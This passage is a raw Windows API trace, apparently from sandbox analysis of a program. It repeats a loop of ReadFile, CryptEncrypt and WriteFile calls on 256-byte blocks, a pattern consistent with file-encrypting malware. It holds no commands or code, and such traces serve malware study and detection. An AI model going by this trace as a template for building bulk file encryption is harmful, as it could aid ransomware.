pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.926] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.926] GetLastError () returned 0x0 [0169.926] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.926] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.927] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.927] GetLastError () returned 0x0 [0169.927] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.927] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.927] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.927] GetLastError () returned 0x0 [0169.927] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.927] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.927] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.927] GetLastError () returned 0x0 [0169.927] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.927] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.959] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.959] GetLastError () returned 0x0 [0169.959] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.959] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.959] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.959] GetLastError () returned 0x0 [0169.959] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.959] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.959] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.959] GetLastError () returned 0x0 [0169.959] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.959] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.959] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.959] GetLastError () returned 0x0 [0169.960] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.960] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.960] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.960] GetLastError () returned 0x0 [0169.960] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.960] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.960] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.960] GetLastError () returned 0x0 [0169.960] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.960] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.960] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.960] GetLastError () returned 0x0 [0169.960] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.960] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.960] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.960] GetLastError () returned 0x0 [0169.960] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.960] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.961] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.961] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.961] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.961] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.961] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.961] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.961] GetLastError () returned 0x0 [0169.961] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.962] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.962] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.962] GetLastError () returned 0x0 [0169.962] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.962] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.962] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.962] GetLastError () returned 0x0 [0169.962] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.962] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.962] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.962] GetLastError () returned 0x0 [0169.962] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.962] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.963] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.963] GetLastError () returned 0x0 [0169.963] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.963] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.963] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.963] GetLastError () returned 0x0 [0169.963] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.963] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.963] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.963] GetLastError () returned 0x0 [0169.963] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.963] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.963] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.963] GetLastError () returned 0x0 [0169.963] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.963] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.963] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.964] GetLastError () returned 0x0 [0169.964] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.964] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.964] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.964] GetLastError () returned 0x0 [0169.964] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.964] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.964] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.964] GetLastError () returned 0x0 [0169.964] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.964] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.964] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0169.964] GetLastError () returned 0x0 [0169.964] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0169.964] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0169.964] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 